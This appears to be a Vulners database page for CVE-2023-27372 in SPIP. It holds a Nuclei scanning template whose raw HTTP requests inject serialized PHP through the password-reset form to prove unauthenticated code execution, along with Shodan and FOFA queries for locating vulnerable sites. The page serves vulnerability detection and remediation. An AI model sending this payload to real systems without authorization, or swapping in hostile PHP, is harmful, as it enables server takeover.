| Reporter | Title | Published | Views | Family All 58 |
|---|---|---|---|---|
| SPIP Remote Command Execution Exploit | 18 Apr 202300:00 | – | zdt | |
| SPIP v4.2.0 - Remote Code Execution (Unauthenticated) Exploit | 26 Jun 202300:00 | – | zdt | |
| Exploit for Deserialization of Untrusted Data in Spip | 11 Jul 202310:00 | – | githubexploit | |
| Exploit for Deserialization of Untrusted Data in Spip | 5 Jul 202314:41 | – | githubexploit | |
| Exploit for Deserialization of Untrusted Data in Spip | 28 Apr 202513:48 | – | githubexploit | |
| Exploit for Deserialization of Untrusted Data in Spip | 1 Jul 202317:08 | – | githubexploit | |
| Exploit for Deserialization of Untrusted Data in Spip | 7 Sep 202316:17 | – | githubexploit | |
| Exploit for Deserialization of Untrusted Data in Spip | 7 Mar 202600:14 | – | githubexploit | |
| Exploit for Deserialization of Untrusted Data in Spip | 31 Jul 202320:32 | – | githubexploit | |
| Exploit for Deserialization of Untrusted Data in Spip | 25 Jun 202319:30 | – | githubexploit |
id: CVE-2023-27372
info:
name: SPIP - Remote Command Execution
author: DhiyaneshDK,nuts7
severity: critical
description: |
SPIP before 4.2.1 allows Remote Code Execution via form values in the public area because serialization is mishandled. The fixed versions are 3.2.18, 4.0.10, 4.1.8, and 4.2.1.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the target system.
remediation: |
Apply the latest security patches or upgrade to a patched version of SPIP.
reference:
- https://packetstormsecurity.com/files/171921/SPIP-Remote-Command-Execution.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-27372
- https://github.com/nuts7/CVE-2023-27372
- http://packetstormsecurity.com/files/171921/SPIP-Remote-Command-Execution.html
- http://packetstormsecurity.com/files/173044/SPIP-4.2.1-Remote-Code-Execution.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-27372
epss-score: 0.99637
epss-percentile: 0.99947
cpe: cpe:2.3:a:spip:spip:*:*:*:*:*:*:*:*
metadata:
verified: "true"
max-request: 2
vendor: spip
product: spip
shodan-query:
- html:"spip.php?page=backend"
- http.html:"spip.php?page=backend"
- cpe:"cpe:2.3:a:spip:spip"
fofa-query: body="spip.php?page=backend"
tags: cve,cve2023,packetstorm,spip,rce,vkev,vuln
http:
- raw:
- |
GET /spip.php?page=spip_pass HTTP/1.1
Host: {{Hostname}}
- |
POST /spip.php?page=spip_pass HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
page=spip_pass&formulaire_action=oubli&formulaire_action_args={{csrf}}&oubli=s:19:"<?php phpinfo(); ?>";
matchers-condition: and
matchers:
- type: word
part: body_2
words:
- "PHP Extension"
- "PHP Version"
- "<!DOCTYPE html"
condition: and
- type: status
status:
- 200
extractors:
- type: regex
name: csrf
group: 1
regex:
- "name='formulaire_action_args'[^>]*value='([^']*)'"
internal: true
part: body_1
- type: regex
group: 1
regex:
- '>PHP Version <\/td><td class="v">([0-9.]+)'
part: body_2
# digest: 4a0a00473045022029777393844b5b0d5295003dc5a1f14c7c5edaf416aab278be2daf8ba1a9d9e2022100a819d6b61c4cccb34b3daaee8396550f597ec32376f4e9a782840823d4689fc7:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation